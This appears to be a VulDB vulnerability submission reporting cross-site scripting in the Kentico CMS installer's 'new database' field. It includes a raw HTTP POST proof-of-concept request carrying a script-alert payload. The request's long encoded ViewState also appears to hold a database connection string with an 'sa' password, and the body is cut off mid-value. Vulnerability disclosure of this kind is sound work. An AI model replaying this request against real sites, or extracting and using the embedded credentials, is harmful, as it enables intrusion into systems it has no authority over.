| 제목 | Kentico CMS 6.0 SP1 Cross Site Scripting |
|---|
| 설명 | When accessing the database configuration page, we enter a payload in the "new database" field and observe the alert prompt being displayed.
URL to use as PoC:
http://example.com/CMSInstall/install.aspx
Request Demo:
POST /CMSInstall/install.aspx HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 13609
Origin: http://example.com
Connection: close
Referer: http://example.com/CMSInstall/install.aspx
Cookie: ASP.NET_SessionId=rbrcup4yxvxofgtxjxvlmvrj
Upgrade-Insecure-Requests: 1
Priority: u=0, i
__EVENTTARGET=btnHiddenNext&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE4NDE3MTA2MjQPFhQeCmNvbm5TdHJpbmcFkwFQZXJzaXN0IFNlY3VyaXR5IEluZm89RmFsc2U7ZGF0YWJhc2U9dGRjaWNvbTtzZXJ2ZXI9VlNSVldFQjAxXFNRTDIwMDg7dXNlciBpZD1zYTtwYXNzd29yZD10ZGNpODc2MDtDdXJyZW50IExhbmd1YWdlPUVuZ2xpc2g7Q29ubmVjdGlvbiBUaW1lb3V0PTI0MDseBnJlc3VsdAWEAUFuIGVycm9yIG9jY3VycmVkIHdoZW4gY3JlYXRpbmcgZGF0YWJhc2U6IENvbm5lY3Rpb24gaW5mb3JtYXRpb24gd2FzIGxvc3QhCkNyZWF0aW5nIGEgbmV3IGRhdGFiYXNlIHRlc3RlIj48c2NyaXB0PmFsZXJ0KDkpPC9zY3JpcHQ%2BCh4MUHJldmlvdXNTdGVwAgEeCERhdGFiYXNlBSB0ZXN0ZSI%2BPHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Ph4LUHJvY2Vzc0dVSUQoKVhTeXN0ZW0uR3VpZCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JGZiN2U1Y2U5LTQyOTEtNGJjZi04MjRkLWE1NzU4MjVmYzdiNB4NU3RlcE9wZXJhdGlvbmYeCXN0ZXBJbmRleAIBHghkaXNwbExvZ2ceEGluc3RhbGwucGFzc3dvcmRlHgpBY3R1YWxTdGVwZhYCAgEQZGQWCAIDD2QWBAIBD2QWAgIBD2QWAmYPZBYCAgEPDxYCHgdWaXNpYmxlZ2QWAgIBDxYCHgVzdHlsZQULd2lkdGg6MTAwJTsWAmYPZBYEZg8WAh8LBR53aWR0aDoxMDAlO3doaXRlLXNwYWNlOm5vd3JhcDtkAgIPZBYCAgEPDxYCHwpoZGQCAw9kFgQCAQ8PFgIeBFRleHQFZFRoaXMgcGFnZSByZXF1aXJlcyBKYXZhc2NyaXB0IHRvIHJ1biBwcm9wZXJseSwgcGxlYXNlIGVuYWJsZSBKYXZhc2NyaXB0IGluIHlvdXIgYnJvd3NlciB0byBjb250aW51ZS5kZAIDDw8WAh8MBRJDaGVjayBhbmQgY29udGludWVkZAIFD2QWCAIBD2QWBgIBDw8WAh8MBRpTdGVwIDEgLSBEYXRhYmFzZSBJbnN0YW5jZWRkAgMPDxYEHghJbWFnZVVybAU3L0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvT3RoZXJzL0luc3RhbGwvaGVhZGVyX2RiLnBuZx4NQWx0ZXJuYXRlVGV4dAUGSGVhZGVyZGQCBQ9kFgICBQ88KwAPAgAPFgoeE1N0YXJ0TmV4dEJ1dHRvblRleHQFBk5leHQgPh4YRmluaXNoQ29tcGxldGVCdXR0b25UZXh0BQhDb250aW51ZR4YRmluaXNoUHJldmlvdXNCdXR0b25UZXh0BQY8IEJhY2seElN0ZXBOZXh0QnV0dG9uVGV4dAUGTmV4dCA%2BHhZTdGVwUHJldmlvdXNCdXR0b25UZXh0BQY8IEJhY2tkDmgWAmYPZBYEAgEPZBYCZg9kFgJmD2QWDGYPZBYMAgEPDxYCHwwFClNRTCBzZXJ2ZXJkZAIDDw8WAh8MBR5TUUwgU2VydmVyIG5hbWUgb3IgSVAgYWRkcmVzczpkZAIHDxAPFgIfDAUWVXNlIFNRTCBTZXJ2ZXIgYWNjb3VudGRkZGQCCQ8PFgIfDAULTG9naW4gbmFtZTpkZAINDw8WAh8MBQlQYXNzd29yZDpkZAIRDxAPFgIfDAV6VXNlIGludGVncmF0ZWQgV2luZG93cyBhdXRoZW50aWNhdGlvbjxiciAvPjxzcGFuIGNsYXNzPSJJbnN0YWxsQWNjb3VudE5hbWUiPihBU1AuTkVUIGFjY291bnQ6IElJUyBBUFBQT09MXHRkY2kuY29tKTwvc3Bhbj5kZGRkAgEPZBYMAgEPDxYCHwwFCERhdGFiYXNlZGQCAw9kFgYCAQ8QDxYCHwwFFUNyZWF0ZSBhIG5ldyBkYXRhYmFzZWRkZGQCAw8PFgIfDAUSTmV3IGRhdGFiYXNlIG5hbWU6ZGQCBQ8PFgQeB0VuYWJsZWRnHwwFIHRlc3RlIj48c2NyaXB0PmFsZXJ0KDkpPC9zY3JpcHQ%2BZGQCBQ8QDxYCHwwFGFVzZSBhbiBleGlzdGluZyBkYXRhYmFzZWRkZGQCBw9kFgQCAQ8PFgIfDAUXRXhpc3RpbmcgZGF0YWJhc2UgbmFtZTpkZAIDDw8WAh8UaGRkAgkPEA8WBh4HQ2hlY2tlZGcfDAUjQ3JlYXRlIEtlbnRpY28gQ01TIGRhdGFiYXNlIG9iamVjdHMfFGhkZGRkAgsPZBYEAgEPDxYEHwwFFVNob3cgYWR2YW5jZWQgb3B0aW9ucx4LTmF2aWdhdGVVcmwFASMWAh4Hb25jbGljawUXIEFkdmFuY2VkT3B0aW9ucygnPycpOyBkAgMPDxYCHwwFFlNjaGVtYSBvZiB0aGUgb2JqZWN0czpkZAICD2QWAgIBD2QWAgIBDw8WAh8MBRFDb25uZWN0aW9uIHN0cmluZ2RkAgQPZBYCAgEPZBYIAgMPDxYCHwwFzQE8Yj5UaXA6PC9iPiBJZiB5b3UgbmVlZCBhIHRlbXBvcmFyeSBsaWNlbnNlIGtleSBmb3IgdGhpcyBkb21haW4sIHBsZWFzZSB3cml0ZSB0byA8YSBocmVmPSJtYWlsdG86c3VwcG9ydEBrZW50aWNvLmNvbSI%2Bc3VwcG9ydEBrZW50aWNvLmNvbTwvYT4gYW5kIGFzayBmb3IgYSB0cmlhbCBrZXkgZm9yIHRoZSBmb2xsb3dpbmcgZG9tYWluIG5hbWU6IHRkY2kuY29tZGQCBQ8PFgIfDAWkAVlvdSBjYW4gYWxzbyBnZXQgYSBsaWNlbnNlIG9mIEtlbnRpY28gQ01TIEZyZWUgRWRpdGlvbiBhZnRlciByZWdpc3RyYXRpb24gYXQgPGEgaHJlZj0iaHR0cDovL3d3dy5rZW50aWNvLmNvbS9kb3dubG9hZC9mcmVlLWVkaXRpb24uYXNweCI%2BaHR0cDovL3d3dy5rZW50aWNvLmNvbTwvYT4uZGQCBw8PFgIfDAUVUGxlYXNlIGVudGVyIHRoZSBrZXk6ZGQCCw8PFgIfDAUQU2tpcCB0aGlzIGRpYWxvZ2RkAgUPZBYCAgEPZBYCAgMPZBYIAggPEA8WAh8MBRNDaG9vc2Ugc3RhcnRlciBzaXRlZGRkZAIKD2QWAgIBDxYCHgtfIUl0ZW1Db3VudAIHFg5mD2QWAmYPFQGLBjxkaXYgY2xhc3M9Ikluc3RhbGxJdGVtIiBpZD0idHBsNzUiIG9uY2xpY2s9IlNlbGVjdFRlbXBsYXRlKCd0cGw3NScsJ0NvcnBvcmF0ZVNpdGUnKSI%2BCjx0YWJsZSBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiIGJvcmRlcj0iMCI%2BCjx0cj4KPHRkIHN0eWxlPSJ2ZXJ0aWNhbC1hbGlnbjp0b3A7Ij4KPGltZyBzdHlsZT0iYm9yZGVyOiAxcHggc29saWQgU2lsdmVyOyBtYXJnaW46IDNweDsiIHNyYz0iL0NNU1BhZ2VzL0dldE1ldGFGaWxlLmFzcHg%2FZmlsZWd1aWQ9Yzg4OGI3YWEtNDNhNC00YjdkLThiN2UtM2NhZGYyMWRmM2VjIiB3aWR0aD0iMTQwIiBoZWlnaHQ9IjEwOCIgYWx0PSJQcmV2aWV3IiAvPgo8L3RkPgo8dGQgc3R5bGU9InZlcnRpY2FsLWFsaWduOnRvcDsiPgo8ZGl2IHN0eWxlPSJtYXJnaW46IDNweDsiPgo8ZGl2Pgo8c3Ryb25nPkNvcnBvcmF0ZSBTaXRlPC9zdHJvbmc%2BPC9kaXY%2BCjxiciAvPjxkaXY%2BVGhpcyBpcyBhIHdlYiB0ZW1wbGF0ZSBmb3IgYSBnZW5lcmFsIGNvcnBvcmF0ZSBzaXRlLiBJdCdzIHVzZWQgYXMgYSBzaG93Y2FzZSBvZiBLZW50aWNvIENNUyBjYXBhYmlsaXRpZXMgYW5kIGl0IGNhbiBiZSB1c2VkIGFzIGEgc3RhcnRpbmcgc2l0ZSB0aGF0IHlvdSBtb2RpZnkgYXMgbmVlZGVkLiBJdCB1c2VzIHRoZSBwb3J0YWwgZW5naW5lIGFuZCBpdCdzIHRoZSByZWNvbW1lbmRlZCBjaG9pY2UgZm9yIGRldmVsb3BlcnMgd2hvIGFyZSBuZXcgdG8gS2VudGljbyBDTVMuPC9kaXY%2BPC9kaXY%2BPC90ZD48L3RyPgo8L3RhYmxlPgo8L2Rpdj4KZAIBD2QWAmYPFQGeBjxkaXYgY2xhc3M9Ikluc3RhbGxJdGVtIiBpZD0idHBsNzkiIG9uY2xpY2s9IlNlbGVjdFRlbXBsYXRlKCd0cGw3OScsJ0VDb21tZXJjZVNpdGUnKSI%2BCjx0YWJsZSBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiIGJvcmRlcj0iMCI%2BCjx0cj4KPHRkIHN0eWxlPSJ2ZXJ0aWNhbC1hbGlnbjp0b3A7Ij4KPGltZyBzdHlsZT0iYm9yZGVyOiAxcHggc29saWQgU2lsdmVyOyBtYXJnaW46IDNweDsiIHNyYz0iL0NNU1BhZ2VzL0dldE1ldGFGaWxlLmFzcHg%2FZmlsZWd1aWQ9ZDZiMzYzMzQtZWQ1Mi00YTVkLTg5MTItMjIyNzdhNjg5YzNjIiB3aWR0aD0iMTQwIiBoZWlnaHQ9IjEwOCIgYWx0PSJQcmV2aWV3IiAvPgo8L3RkPgo8dGQgc3R5bGU9InZlcnRpY2FsLWFsaWduOnRvcDsiPgo8ZGl2IHN0eWxlPSJtYXJnaW46IDNweDsiPgo8ZGl2Pgo8c3Ryb25nPkUtY29tbWVyY2UgU2l0ZTwvc3Ryb25nPjwvZGl2Pgo8YnIgLz48ZGl2PlRoaXMgaXMgYSB3ZWIgdGVtcGxhdGUgZm9yIGEgc2ltcGxlIEUtY29tbWVyY2Ugc2l0ZS4gSXQncyB1c2VkIGFzIGEgc2hvd2Nhc2Ugb2YgS2VudGljbyBDTVMgRS1jb21tZXJjZSBtb2R1bGUgY2FwYWJpbGl0aWVzIGFuZCBpdCBjYW4gYmUgdXNlZCBhcyBhIHN0YXJ0aW5nIHNpdGUgdGhhdCB5b3UgbW9kaWZ5IGFzIG5lZWRlZC4gSXQgdXNlcyB0aGUgcG9ydGFsIGVuZ2luZSBhbmQgaXQncyB0aGUgcmVjb21tZW5kZWQgY2hvaWNlIGZvciBkZXZlbG9wZXJzIHdobyBhcmUgbmV3IHRvIEtlbnRpY28gQ01TLjwvZGl2PjwvZGl2PjwvdGQ%2BPC90cj4KPC90YWJsZT4KPC9kaXY%2BCmQCAg9kFgJmDxUBvgY8ZGl2IGNsYXNzPSJJbnN0YWxsSXRlbSIgaWQ9InRwbDgwIiBvbmNsaWNrPSJTZWxlY3RUZW1wbGF0ZSgndHBsODAnLCdQZXJzb25hbFNpdGUnKSI%2BCjx0YWJsZSBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiIGJvcmRlcj0iMCI%2BCjx0cj4KPHRkIHN0eWxlPSJ2ZXJ0aWNhbC1hbGlnbjp0b3A7Ij4KPGltZyBzdHlsZT0iYm9yZGVyOiAxcHggc29saWQgU2lsdmVyOyBtYXJnaW46IDNweDsiIHNyYz0iL0NNU1BhZ2VzL0dldE1ldGFGaWxlLmFzcHg%2FZmlsZWd1aWQ9ZmRiYzI2M2UtOGJmMy00OGU4LWJiOTMtNDY4NjU2OGQ4MGVlIiB3aWR0aD0iMTQwIiBoZWlnaHQ9IjEwOCIgYWx0PSJQcmV2aWV3IiAvPgo8L3RkPgo8dGQgc3R5bGU9InZlcnRpY2FsLWFsaWduOnRvcDsiPgo8ZGl2IHN0eWxlPSJtYXJnaW46IDNweDsiPgo8ZGl2Pgo8c3Ryb25nPlBlcnNvbmFsIFNpdGU8L3N0cm9uZz48L2Rpdj4KPGJyIC8%2BPGRpdj5UaGlzIGlzIGEgd2ViIHRlbXBsYXRlIGZvciBhIHNhbXBsZSBQZXJzb25hbCBzaXRlLiBTZXZlcmFsIEtlbnRpY28gQ01TIGZlYXR1cmVzLCBzdWNoIGFzIGJsb2dzLCBmb3J1bXMgYW5kIHBob3RvIGdhbGxlcmllcywgYXJlIGluY2x1ZGVkLiBJdCBjYW4gYmUgdXNlZCBhcyBhIGNvcm5lcnN0b25lIGZvciB0aGUgY3VzdG9tIHBlcnNvbmFsIHNpdGUgZGV2ZWxvcG1lbnQuIFRoZSB0ZW1wbGF0ZSB1c2VzIHRoZSBwb3J0YWwgZW5naW5lIGFuZCBpdCBpcyB0aGUgcmVjb21tZW5kZWQgY2hvaWNlIGZvciBkZXZlbG9wZXJzIHdobyBhcmUgbmV3IHRvIEtlbnRpY28gQ01TLjwvZGl2PjwvZGl2PjwvdGQ%2BPC90cj4KPC90YWJsZT4KPC9kaXY%2BCmQCAw9kFgJmDxUB5wY8ZGl2IGNsYXNzPSJJbnN0YWxsSXRlbSIgaWQ9InRwbDgxIiBvbmNsaWNrPSJTZWxlY3RUZW1wbGF0ZSgndHBsODEnLCdDb21tdW5pdHlTaXRlJykiPgo8dGFibGUgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIiBib3JkZXI9IjAiPgo8dHI%2BCjx0ZCBzdHlsZT0idmVydGljYWwtYWxpZ246dG9wOyI%2BCjxpbWcgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkIFNpbHZlcjsgbWFyZ2luOiAzcHg7IiBzcmM9Ii9DTVNQYWdlcy9HZXRNZXRhRmlsZS5hc3B4P2ZpbGVndWlkPTE3ZTIwZjNiLTgzNTgtNDlkMC1hMDhkLWU4NTVmYzllMmY4NyIgd2lkdGg9IjE0MCIgaGVpZ2h0PSIxMDgiIGFsdD0iUHJldmlldyIgLz4KPC90ZD4KPHRkIHN0eWxlPSJ2ZXJ0aWNhbC1hbGlnbjp0b3A7Ij4KPGRpdiBzdHlsZT0ibWFyZ2luOiAzcHg7Ij4KPGRpdj4KPHN0cm9uZz5Db21tdW5pdHkgU2l0ZTwvc3Ryb25nPjwvZGl2Pgo8YnIgLz48ZGl2PlRoaXMgaXMgYSB3ZWIgc2l0ZSB0ZW1wbGF0ZSBmb3IgYSBzYW1wbGUgY29tbXVuaXR5IHNpdGUuIFNvY2lhbCBuZXR3b3JraW5nIGZlYXR1cmVzIG9mIEtlbnRpY28gQ01TIGFyZSB1c2VkIG9uIHRoZSBzaXRlIHRvIGdpdmUgeW91IGFuIGlkZWEgb2YgaG93IHRoZXkgY2FuIGJlIHVzZWQgb24geW91ciB3ZWIgc2l0ZS4gWW91IGNhbiBhbHNvIG1vZGlmeSB0aGlzIHdlYiBzaXRlIGFuZCB1c2UgaXQgYXMgYSBiYXNlIGZvciB0aGUgZGV2ZWxvcG1lbnQgb2YgeW91ciBvd24gc2l0ZS4gSXQgdXNlcyB0aGUgcG9ydGFsIGVuZ2luZSBhbmQgaXMgcmVjb21tZW5kZWQgZm9yIGRldmVsb3BlcnMgd2hvIGFyZSBuZXcgdG8gS2VudGljbyBDTVMuPC9kaXY%2BPC9kaXY%2BPC90ZD48L3RyPgo8L3RhYmxlPgo8L2Rpdj4KZAIED2QWAmYPFQGgBzxkaXYgY2xhc3M9Ikluc3RhbGxJdGVtIiBpZD0idHBsODYiIG9uY2xpY2s9IlNlbGVjdFRlbXBsYXRlKCd0cGw4NicsJ0ludHJhbmV0UG9ydGFsJykiPgo8dGFibGUgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIwIiBib3JkZXI9IjAiPgo8dHI%2BCjx0ZCBzdHlsZT0idmVydGljYWwtYWxpZ246dG9wOyI%2BCjxpbWcgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkIFNpbHZlcjsgbWFyZ2luOiAzcHg7IiBzcmM9Ii9DTVNQYWdlcy9HZXRNZXRhRmlsZS5hc3B4P2ZpbGVndWlkPTY4MzFjZDU2LWE0YTItNGNiOS1hMGFhLTk1OWFlZWMzN2UxNCIgd2lkdGg9IjE0MCIgaGVpZ2h0PSIxMDgiIGFsdD0iUHJldmlldyIgLz4KPC90ZD4KPHRkIHN0eWxlPSJ2ZXJ0aWNhbC1hbGlnbjp0b3A7Ij4KPGRpdiBzdHlsZT0ibWFyZ2luOiAzcHg7Ij4KPGRpdj4KPHN0cm9uZz5JbnRyYW5ldCBQb3J0YWw8L3N0cm9uZz48L2Rpdj4KPGJyIC8%2BPGRpdj5UaGlzIGlzIGEgcmVhZHktdG8tdXNlIHdlYnNpdGUgdGVtcGxhdGUgZm9yIGEgc2FtcGxlIGludHJhbmV0IHBvcnRhbCBzaXRlLiBUaGUgc2l0ZSBzaG93Y2FzZXMgbWFueSBmZWF0dXJlcyB1c2VmdWwgZm9yIGEgY29tcGFueSBpbnRyYW5ldCwgc3VjaCBhcyBzdWItc2VjdGlvbnMgZGVkaWNhdGVkIHRvIGRlcGFydG1lbnRzIG9yIHdvcmtncm91cHMgYW5kIGRvY3VtZW50IG9yIHByb2plY3QgbWFuYWdlbWVudC4gWW91IG1heSB1c2UgaXQgYXMgYSBiYXNlIGZvciB5b3VyIG93biBjb21wYW55IGludHJhbmV0IGJ5IHJlcGxhY2luZyB0aGUgc2FtcGxlIGRhdGEgd2l0aCB5b3VyIG93bi4gSXQgdXNlcyB0aGUgcG9ydGFsIGVuZ2luZSBhbmQgbWF5IGJlIHVzZWQgYnkgZGV2ZWxvcGVycyB3aG8gYXJlIG5ldyB0byBLZW50aWNvIENNUy48L2Rpdj48L |
|---|
| 사용자 | c4ng4c3ir0 (UID 38456) |
|---|
| 제출 | 2025. 02. 18. PM 02:12 (1 년도 ago) |
|---|
| 모더레이션 | 2025. 03. 27. PM 07:03 (1 month later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 301813 [Kentico CMS 까지 13.0.178 Additional Database Installation Wizard /CMSInstall/install.aspx new database 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|